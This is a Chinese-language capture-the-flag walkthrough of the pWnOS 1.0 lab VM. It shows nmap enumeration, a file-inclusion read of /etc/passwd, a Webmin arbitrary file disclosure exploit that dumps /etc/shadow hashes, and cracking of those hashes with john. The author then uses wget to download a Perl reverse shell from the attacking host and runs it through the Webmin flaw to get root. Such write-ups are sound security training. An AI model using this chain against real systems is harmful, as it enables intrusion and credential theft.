pWnos1.0 靶机渗透 (Perl CGI 的反弹 shell 利用)

靶机介绍

来自 vulnhub

主机发现

┌──(kali㉿kali)-[~/testPwnos1.0]                                                                                                                                                                                                                                                                              20:33:00 [0/3]
└─$ sudo nmap -sn 10.10.10.0/24                                 
[sudo] password for kali:                                       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-05 20:32 CST                                                                                            
Nmap scan report for localhost (10.10.10.1)                                    
Host is up (0.00056s latency).                                                                                                   
MAC Address: 00:50:56:C0:00:08 (VMware)                                        
Nmap scan report for bogon (10.10.10.2)                         
Host is up (0.00010s latency).                                                                                                   
MAC Address: 00:50:56:F3:32:0E (VMware)                                                                                          
Nmap scan report for bogon (10.10.10.128)                                                                                        
Host is up (0.000096s latency).                                                                                                                               
MAC Address: 00:0C:29:83:4F:85 (VMware)                                        
Nmap scan report for bogon (10.10.10.131)                       
Host is up (0.00011s latency).                                                                                                   
MAC Address: 00:0C:29:5E:18:C9 (VMware)                                                                                          
Nmap scan report for bogon (10.10.10.254)                                                                                        
Host is up (0.00011s latency).                                  
MAC Address: 00:50:56:EB:94:F3 (VMware)                         
Nmap scan report for bogon (10.10.10.129)                                                                                        
Host is up.                                                                                                                                                   
Nmap done: 256 IP addresses (6 hosts up) scanned in 1.93 seconds                                                                                              ┌──(kali㉿kali)-[~/testPwnos1.0]                                
└─$ sudo nmap --min-rate 1000 -p- 10.10.10.131                                 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-05 20:35 CST                                                               
Nmap scan report for localhost (10.10.10.131)                                  
Host is up (0.0013s latency).                                   
Not shown: 65530 closed tcp ports (reset)                       
PORT      STATE SERVICE                                                        
22/tcp    open  ssh                                                            
80/tcp    open  http                                                                                                                                          
139/tcp   open  netbios-ssn                                                    
445/tcp   open  microsoft-ds                                                   
10000/tcp open  snet-sensor-mgmt                                               
MAC Address: 00:0C:29:5E:18:C9 (VMware)                                        Nmap done: 1 IP address (1 host up) scanned in 4.08 seconds                                                                                                                                                                              ┌──(kali㉿kali)-[~/testPwnos1.0]                                               
└─$ sudo nmap -sU --min-rate 10000 -p- 10.10.10.131                                                                                                           
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-05 20:43 CST                                                                                            
Warning: 10.10.10.131 giving up on port because retransmission cap hit (10).                                                                                  
Nmap scan report for localhost (10.10.10.131)                                  
Host is up (0.00050s latency).                                                 
Not shown: 65455 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)                                                                    
PORT      STATE SERVICE                                                        
137/udp   open  netbios-ns                                                     
10000/udp open  ndmp                                                           
MAC Address: 00:0C:29:5E:18:C9 (VMware)                                        Nmap done: 1 IP address (1 host up) scanned in 72.84 seconds 

tcp 扫描,扫描服务版本,扫描操作系统

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ sudo nmap -sT -sV -O -p22,80,139,445,10000 10.10.10.131                    
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-05 20:39 CST
Nmap scan report for localhost (10.10.10.131)
Host is up (0.00014s latency).PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|WAP|broadband router|remote management|media device|VoIP phone
Running (JUST GUESSING): Linux 2.6.X|2.4.X (98%), Linksys embedded (95%), Arris embedded (94%), Dell embedded (93%), LifeSize embedded (93%), ShoreTel embedded (93%), Netgear embedded (93%)
OS CPE: cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:linksys:wrv54g cpe:/h:dell:remote_access_card:7 cpe:/o:linux:linux_kernel:2.4 cpe:/h:shoretel:8800 cpe:/h:netgear:neotv550
Aggressive OS guesses: Linux 2.6.22 (embedded, ARM) (98%), Linux 2.6.22 - 2.6.23 (98%), Linux 2.6.9 - 2.6.33 (97%), Linksys WRV54G WAP (95%), Linksys WRT610Nv3 WAP (95%), Linux 2.6.18 - 2.6.32 (94%), Arr
is TG862G/CT cable modem (94%), Linux 2.6.24 (94%), Linux 2.6.19 - 2.6.36 (93%), Linux 2.6.22 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop                           
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.76 seconds

漏洞脚本扫描。80 端口的 /icons/,/index/,/php/ 是enum ,似乎有点价值

┌──(kali㉿kali)-[~/testPwnos1.0]                                                                                                                                                                                                                                                                                            
└─$ sudo nmap --script=vuln -p22,80,139,445,10000 10.10.10.131                                                                                                                                                                                                                                                              
[sudo] password for kali:                                                                                                                                                                                                                                                                                                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-05 20:40 CST                                                                                                                                                                                                                                                          
Nmap scan report for localhost (10.10.10.131)                                                                                                                                                                                                                                                                               
Host is up (0.00027s latency).                                                                                                                                                                                                                                                                                              PORT      STATE SERVICE                                                                                                                                                                                                                                                                                                     
22/tcp    open  ssh                                                                                                                                                                                                                                                                                                         
80/tcp    open  http                                                                                                                                                                                                                                                                                                        
|_http-trace: TRACE is enabled                                                                                                                                
|_http-dombased-xss: Couldn't find any DOM based XSS.                                                                                                                           
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)                                                                                                   
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.                                                                                                                
|_http-csrf: Couldn't find any CSRF vulnerabilities.                                                                                                          
| http-slowloris-check:                                                                 
|   VULNERABLE:                                                                                                                                                                   
|   Slowloris DOS attack                                                                                                                                                        
|     State: LIKELY VULNERABLE                                                                                                                                                    
|     IDs:  CVE:CVE-2007-6750                                                            
|       Slowloris tries to keep many connections to the target web server open and hold                                                                       
|       them open as long as possible.  It accomplishes this by opening connections to                                                                      
|       the target web server and sending a partial request. By doing so, it starves                                                                          
|       the http server's resources causing Denial Of Service.                                                                                                
|                                                                                                                                                                               
|     Disclosure date: 2009-09-17                                                        
|     References:                                                                        
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750                                                                                                              
|_      http://ha.ckers.org/slowloris/                                                                                                                                            
| http-enum:                                                                                                                                                                      
|   /icons/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'                                                       
|   /index/: Potentially interesting folder                                              
|_  /php/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'                                                         
139/tcp   open  netbios-ssn                                                                                                                                                       
445/tcp   open  microsoft-ds                                                                                                                                                      
10000/tcp open  snet-sensor-mgmt                                                         
| http-vuln-cve2006-3392:                                                                
|   VULNERABLE:                                                                
|   Webmin File Disclosure                                                               
|     State: VULNERABLE (Exploitable)                                                    
|     IDs:  CVE:CVE-2006-3392                                                                                                                                                     
|       Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.                                                   
|       This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences                                                     
|       to bypass the removal of "../" directory traversal sequences.                                                                                         
|                                                                              
|     Disclosure date: 2006-06-29                                              
|     References:                                                              
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392                                                                                          
|       http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure                                                                               
|_      http://www.exploit-db.com/exploits/1997/                               
MAC Address: 00:0C:29:5E:18:C9 (VMware)                                        Host script results:                                                           
|_smb-vuln-ms10-054: false                                                     
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)                                                                                       
|_smb-vuln-ms10-061: false                                                     Nmap done: 1 IP address (1 host up) scanned in 320.83 seconds    

web渗透

访问 80 端口
在这里插入图片描述观察 10000 端口跑 http 服务,尝试访问
在这里插入图片描述
(你这网站不保熟啊)
在这里插入图片描述
加个单引号,有报错回显,当前页似乎在包含一个文件显示,尝试利用文件包含
(这个参数是否可以通过模糊测试 fuzz 来找到呢?)
在这里插入图片描述果然存在文件包含
在这里插入图片描述
用curl 请求,看得清楚一些。curl 请求应当加引号,防止转义符转义
发现这几个用户有意思

vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash                                      
obama:x:1001:1001::/home/obama:/bin/bash                                                 
osama:x:1002:1002::/home/osama:/bin/bash                                                 
yomama:x:1003:1003::/home/yomama:/bin/bash     
┌──(kali㉿kali)-[~/testPwnos1.0]                                                         
└─$ curl 'http://10.10.10.131/index1.php?help=true&connect=/etc/passwd'                                                                                                           
<HTML>                                                                                   
<body>                                                                                   
<center><h1>Welcome to the pWnOS homepage!                                               
</h1></center>                                                                           <p>This is the official help page. If you're too big of a n00b to figure this out, enter your information below for a small hint. :)</p>                                                                                                                                                                                                                            <form name="form" method="GET" action="index2.php">                                      
<table border=1>                                                                         
<tr><td width=175>                                                                       
Name:                                                                                    
</td>                                                                                    
<td width=175>                                                                           
<input type = "text" name="name" size=25>                                                
</td>                                                                                    
<td>&nbsp;</td>                                                                          
<td>&nbsp;</td>                                                                          
</tr>                                                                                    
<tr>                                                                                     
<td>                                                                                     
Skillz:                                                                                  
</td>                                                                                    
<td width=175><input type = "radio" name = "level" value="n00b">n00b</td>                                                                                                         
<td width=175><input type = "radio" name = "level" value="sk1ll3d n00b">sk1ll3d n00b</td>                                                                                         
<td width=175><input type = "radio" name = "level" value = "l33t hax0r">l33t hax0r</td>                                                                                           
</tr>                                                                                    
<tr><td width=175>                                                                       
<input type = "submit" name = "submit" value = "Please Help!">                           
</td>                                                                                    
<td>&nbsp;</td>                                                                          
<td>&nbsp;</td>                                                                          
<td>&nbsp;</td>                                                                          
</tr>                                                                                    </table>                                                                                 
</form>                                                                                  root:x:0:0:root:/root:/bin/bash                                                          
daemon:x:1:1:daemon:/usr/sbin:/bin/sh                                                    
bin:x:2:2:bin:/bin:/bin/sh                                                               
sys:x:3:3:sys:/dev:/bin/sh                                                               
sync:x:4:65534:sync:/bin:/bin/sync                                                       
games:x:5:60:games:/usr/games:/bin/sh                                                    
man:x:6:12:man:/var/cache/man:/bin/sh                                                    
lp:x:7:7:lp:/var/spool/lpd:/bin/sh                                                       
mail:x:8:8:mail:/var/mail:/bin/sh                                                        
news:x:9:9:news:/var/spool/news:/bin/sh                                                  
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh                                                
proxy:x:13:13:proxy:/bin:/bin/sh                                                         
www-data:x:33:33:www-data:/var/www:/bin/sh                                               
backup:x:34:34:backup:/var/backups:/bin/sh                                               
list:x:38:38:Mailing List Manager:/var/list:/bin/sh                                      
irc:x:39:39:ircd:/var/run/ircd:/bin/sh                                                   
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh                                                                                                           
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh                                         
dhcp:x:100:101::/nonexistent:/bin/false                                                  
syslog:x:101:102::/home/syslog:/bin/false                                                
klog:x:102:103::/home/klog:/bin/false                                                    
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false                                
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin                                        
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash                                      
obama:x:1001:1001::/home/obama:/bin/bash                                                 
osama:x:1002:1002::/home/osama:/bin/bash                                                 
yomama:x:1003:1003::/home/yomama:/bin/bash                                               </body>                                                                                  
</HTML>          

看一看 80 端口 /php/ 的内容
在这里插入图片描述点击进入,不过没有密码。发现系统名称和版本暴露,下一步尝试 searchsploit

Welcome to phpMyAdmin 2.6.3-pl1

在这里插入图片描述不过跨站脚本没啥用

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ searchsploit phpmyadmin 2.6.3                   
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Exploit Title                                                                                                                                                           |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
phpMyAdmin 2.6.3-pl1 - Cross-Site Scripting / Full Path                                                                                                                  | php/webapps/12642.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

漏洞脚本利用

根据漏洞脚本扫描的结果,发现 10000 端口跑的是 webmin ,根据经验推测其可被利用
searchsploit 找一找

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ searchsploit webmin          
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Exploit Title                                                                                                                                                           |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal                                                                                                          | cgi/webapps/23535.txt
phpMyWebmin 1.0 - 'target' Remote File Inclusion                                                                                                                         | php/webapps/2462.txt
phpMyWebmin 1.0 - 'window.php' Remote File Inclusion                                                                                                                     | php/webapps/2451.txt
Webmin - Brute Force / Command Execution                                                                                                                                 | multiple/remote/705.pl
webmin 0.91 - Directory Traversal                                                                                                                                        | cgi/remote/21183.txt
Webmin 0.9x / Usermin 0.9x/1.0 - Access Session ID Spoofing                                                                                                              | linux/remote/22275.pl
Webmin 0.x - 'RPC' Privilege Escalation                                                                                                                                  | linux/remote/21765.pl
Webmin 0.x - Code Input Validation                                                                                                                                       | linux/local/21348.txt
Webmin 1.5 - Brute Force / Command Execution                                                                                                                             | multiple/remote/746.pl
Webmin 1.5 - Web Brute Force (CGI)                                                                                                                                       | multiple/remote/745.pl
Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploit)                                                                                                    | unix/remote/21851.rb
Webmin 1.850 - Multiple Vulnerabilities                                                                                                                                  | cgi/webapps/42989.txt
Webmin 1.900 - Remote Command Execution (Metasploit)                                                                                                                     | cgi/remote/46201.rb
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)                                                                                                   | linux/remote/46984.rb
Webmin 1.920 - Remote Code Execution                                                                                                                                     | linux/webapps/47293.sh
Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)                                                                                                        | linux/remote/47230.rb
Webmin 1.962 - 'Package Updates' Escape Bypass RCE (Metasploit)                                                                                                          | linux/webapps/49318.rb
Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)                                                                                                               | linux/webapps/50144.py
Webmin 1.973 - 'save_user.cgi' Cross-Site Request Forgery (CSRF)                                                                                                         | linux/webapps/50126.py
Webmin 1.984 - Remote Code Execution (Authenticated)                                                                                                                     | linux/webapps/50809.py
Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)                                                                                                               | linux/webapps/50998.py
Webmin 1.x - HTML Email Command Execution                                                                                                                                | cgi/webapps/24574.txt
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure                                                                                                             | multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure                                                                                                             | multiple/remote/2017.pl
Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit)                                                                                                            | linux/webapps/47330.rb
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

排除 metasploit 和 csrf 和 内核提权,发现 2017.pl 似乎可以使用

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ searchsploit webmin -m 2017.pl
[!] Could not find EDB-ID #Exploit: Webmin < 1.290 / Usermin < 1.220 - Arbitrary File DisclosureURL: https://www.exploit-db.com/exploits/2017Path: /usr/share/exploitdb/exploits/multiple/remote/2017.plCodes: CVE-2006-3392Verified: True
File Type: Perl script text executable
Copied to: /home/kali/testPwnos1.0/2017.pl

摸索一下这个脚本怎么用,成功运行后拿到 passwd 的内容,不过和之前 80 端口文件包含拿到的内容相同。

┌──(kali㉿kali)-[~/testPwnos1.0]                                
└─$ ./2017.pl 10.10.10.131 10000 /etc/passwd                    
Usage: ./2017.pl <url> <port> <filename> <target>                                                                                
TARGETS are                                                     0  - > HTTP                                                    1  - > HTTPS                                                   
Define full path with file name                                 
Example: ./webmin.pl blah.com 10000 /etc/passwd                 ┌──(kali㉿kali)-[~/testPwnos1.0]                                
└─$ ./2017.pl 10.10.10.131 10000 /etc/passwd 0                  
WEBMIN EXPLOIT !!!!! coded by UmZ!                              
Comments and Suggestions are welcome at umz32.dll [at] gmail.com                                                                 
Vulnerability disclose at securitydot.net                       
I am just coding it in perl 'cuz I hate PHP!                    
Attacking 10.10.10.131 on port 10000!                           
FILENAME:  /etc/passwd                                          FILE CONTENT STARTED                                           -----------------------------------                            
root:x:0:0:root:/root:/bin/bash                                 
daemon:x:1:1:daemon:/usr/sbin:/bin/sh                           
bin:x:2:2:bin:/bin:/bin/sh                                      
sys:x:3:3:sys:/dev:/bin/sh                                      
sync:x:4:65534:sync:/bin:/bin/sync                              
games:x:5:60:games:/usr/games:/bin/sh                           
man:x:6:12:man:/var/cache/man:/bin/sh                           
lp:x:7:7:lp:/var/spool/lpd:/bin/sh                              
mail:x:8:8:mail:/var/mail:/bin/sh                               
news:x:9:9:news:/var/spool/news:/bin/sh                         
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh                       
proxy:x:13:13:proxy:/bin:/bin/sh                                
www-data:x:33:33:www-data:/var/www:/bin/sh                      
backup:x:34:34:backup:/var/backups:/bin/sh                      
list:x:38:38:Mailing List Manager:/var/list:/bin/sh                                                                              
irc:x:39:39:ircd:/var/run/ircd:/bin/sh                          
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh                                                          
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh                
dhcp:x:100:101::/nonexistent:/bin/false                         
syslog:x:101:102::/home/syslog:/bin/false                       
klog:x:102:103::/home/klog:/bin/false                           
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false                                                                        
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin               
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash                                                                              
obama:x:1001:1001::/home/obama:/bin/bash                        
osama:x:1002:1002::/home/osama:/bin/bash                        
yomama:x:1003:1003::/home/yomama:/bin/bash                      -------------------------------------  

之前 80 端口的网页文件包含没法读 shadow,于是尝试用利用脚本读 shadow。
居然可以读到 shadow

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ ./2017.pl 10.10.10.131 10000 /etc/shadow 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.10.10.131 on port 10000!
FILENAME:  /etc/shadowFILE CONTENT STARTED-----------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::-------------------------------------

恰好拿到我们关心用户的密码的哈希 (居然也拿到了 root 的密码哈希)

root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::

密码破解

尝试破解。 shadow 内容的 md5 可用 john 破解,其余 md5 或 sha-1 可用 hashcat 破解。
拿到一个密码,vmware 的 密码是 h4ckm3 (味道很冲的密码)

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ sudo john hash --wordlist=/usr/share/wordlists/rockyou.txt
[sudo] password for kali: 
Created directory: /root/.john
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
h4ckm3           (vmware)     
1g 0:00:03:18 DONE (2024-10-05 22:20) 0.005031g/s 70943p/s 322002c/s 322002C/s  ejngyhga007..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

补充额外知识点:
如果拿到 passwd 和 shadow ,可以尝试使用 unshadow 把二者合起来,如下
unshadow passwd shadows > unshadow.txt

连 ssh ,这里涉及 ssh 参数调整 -oHostKeyAlgorithms= 指定加密算法

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ sudo ssh vmware@10.10.10.131                   
[sudo] password for kali: 
Unable to negotiate with 10.10.10.131 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ sudo ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss vmware@10.10.10.131
The authenticity of host '10.10.10.131 (10.10.10.131)' can't be established.
RSA key fingerprint is SHA256:+C7UA7dQ1B/8zVWHRBD7KeNNfjuSBrtQBMZGd6qoR9w.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.131' (RSA) to the list of known hosts.
vmware@10.10.10.131's password: 
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Fri Jun 20 14:35:37 2008
vmware@ubuntuvm:~$ 

拿到初级 shell 后

做一个基础的信息收集
当前账号没有 sudo 权限,考虑提权

vmware@ubuntuvm:~$ whoami
vmware
vmware@ubuntuvm:~$ ip a
1: lo: <LOOPBACK,UP,10000> mtu 16436 qdisc noqueue link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host loinet6 ::1/128 scope host valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,10000> mtu 1500 qdisc pfifo_fast qlen 1000link/ether 00:0c:29:5e:18:c9 brd ff:ff:ff:ff:ff:ffinet 10.10.10.131/24 brd 10.10.10.255 scope global eth0inet6 fe80::20c:29ff:fe5e:18c9/64 scope link valid_lft forever preferred_lft forever
vmware@ubuntuvm:~$ sudo -l
[sudo] password for vmware:
Sorry, user vmware may not run sudo on ubuntuvm.
vmware@ubuntuvm:~$ uname -a
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
vmware@ubuntuvm:~$ python --version
Python 2.5.1
vmware@ubuntuvm:~$ python -c "import pty;pty.spawn('/bin/bash')"

看一下计划任务,似乎没有

vmware@ubuntuvm:~$ cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

看一下网站目录。webmin 和 www 由 root 用户创建,权限比较高。结合 webmin 能读 shadow 文件,推测这两个目录权限较高,可作为突破口

vmware@ubuntuvm:~$ cd /var
vmware@ubuntuvm:/var$ ls -liah
total 52K
244801 drwxr-xr-x 15 root root  4.0K 2008-06-10 13:28 .2 drwxr-xr-x 21 root root  4.0K 2008-06-10 06:37 ..
261122 drwxr-xr-x  2 root root  4.0K 2008-06-10 06:28 backups
244808 drwxr-xr-x  9 root root  4.0K 2008-06-10 07:07 cache
244804 drwxr-xr-x 23 root root  4.0K 2008-06-10 07:08 lib
261125 drwxrwsr-x  2 root staff 4.0K 2007-10-08 05:47 local7612 drwxrwxrwt  3 root root    60 2024-10-05 07:27 lock
261126 drwxr-xr-x 11 root root  4.0K 2024-10-05 07:27 log
262195 drwxrwsr-x  2 root mail  4.0K 2008-06-10 06:24 mail
262194 drwxr-xr-x  2 root root  4.0K 2008-06-10 06:24 opt7608 drwxr-xr-x 11 root root   400 2024-10-05 09:48 run
261127 drwxr-xr-x  5 root root  4.0K 2008-06-10 07:07 spool
261128 drwxrwxrwt  2 root root  4.0K 2007-10-08 05:47 tmp
344741 drwx------  2 root bin   4.0K 2008-06-10 13:31 webmin
295040 drwxr-xr-x  3 root root  4.0K 2008-06-12 09:55 www
vmware@ubuntuvm:/var$ 

构造 perl 的 cgi 反弹 shell
vim 修改 反弹 ip 的地址为 kali
开 php 服务器,准备让靶机下载文件

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ cp /usr/share/webshells/perl/perl-reverse-shell.pl shell.cgi┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ ls
2017.pl  hash  passwd  shadow  shell.cgi  unshadow.txt┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ vim shell.cgi ┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ sudo php -S 0:80                                                      
[sudo] password for kali: 
[Sat Oct  5 23:04:23 2024] PHP 8.2.21 Development Server (http://0:80) started

使用靶机下载 .cgi 并给执行权限

vmware@ubuntuvm:~$ pwd
/home/vmware
vmware@ubuntuvm:~$ wget http://10.10.10.129/shell.cgi
--10:06:15--  http://10.10.10.129/shell.cgi=> `shell.cgi'
Connecting to 10.10.10.129:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,715 (3.6K)100%[====================================>] 3,715         --.--K/s             10:06:15 (505.77 MB/s) - `shell.cgi' saved [3715/3715]vmware@ubuntuvm:~$ ls
shell.cgi
vmware@ubuntuvm:~$ chmod +x shell.cgi 

监听,尝试收反弹 shell

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ sudo ncat -lvnp 1234                                   
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234

之前的 perl 脚本可以请求指定位置文件,结合 perl 的 CGI 脚本执行需要网络请求的特性,使用脚本请求在 kali 构造好的反弹 shell。
(似乎也可尝试 本地执行)

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ sudo ./2017.pl 10.10.10.131 10000 /home/vmware/shell.cgi 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.10.10.131 on port 10000!
FILENAME:  /home/vmware/shell.cgiFILE CONTENT STARTED-----------------------------------
Browser IP address appears to be: 10.10.10.129<p>-------------------------------------

从监听收到反弹 shell,拿下 root

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ sudo ncat -lvnp 1234                                   
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.131:44869.10:13:26 up  2:45,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
vmware   pts/0    10.10.10.129     09:25    6:41m  0.07s  0.01s python -c impor
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
uid=0(root) gid=0(root)
/
/usr/sbin/apache: can't access tty; job control turned off
# 
# whoami
root
# ip a
1: lo: <LOOPBACK,UP,10000> mtu 16436 qdisc noqueue link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host loinet6 ::1/128 scope host valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,10000> mtu 1500 qdisc pfifo_fast qlen 1000link/ether 00:0c:29:5e:18:c9 brd ff:ff:ff:ff:ff:ffinet 10.10.10.131/24 brd 10.10.10.255 scope global eth0inet6 fe80::20c:29ff:fe5e:18c9/64 scope link valid_lft forever preferred_lft forever
# sudo -l
User root may run the following commands on this host:(ALL) ALL
# 

总结

主机发现,机器开放 22, 80, 10000 端口
